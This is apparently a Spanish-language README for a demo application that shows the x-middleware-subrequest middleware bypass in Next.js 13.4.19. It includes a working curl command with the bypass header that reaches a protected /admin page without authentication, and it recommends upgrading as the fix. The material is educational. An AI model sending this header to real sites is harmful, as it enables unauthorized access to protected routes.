
Esta aplicación demuestra la vulnerabilidad x-middleware-subrequest en Next.js 13.4.19, que permite evadir la protección del middleware.
npm install
npm run dev
La aplicación tiene una página de administración en /admin que debería estar protegida por middleware. Sin embargo, se puede acceder a ella sin autenticación utilizando la cabecera x-middleware-subrequest.
/admin - Serás redirigido a /login/adminPara evadir la autenticación, puedes usar curl o cualquier cliente HTTP para realizar una solicitud con la cabecera x-middleware-subrequest:
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
Esta vulnerabilidad demuestra cómo se puede evadir la protección del middleware en Next.js 13.4.19 mediante el uso de la cabecera x-middleware-subrequest. En un entorno de producción, esto podría permitir el acceso no autorizado a rutas protegidas.
Para corregir esta vulnerabilidad, actualiza a una versión más reciente de Next.js en la que este problema haya sido parcheado.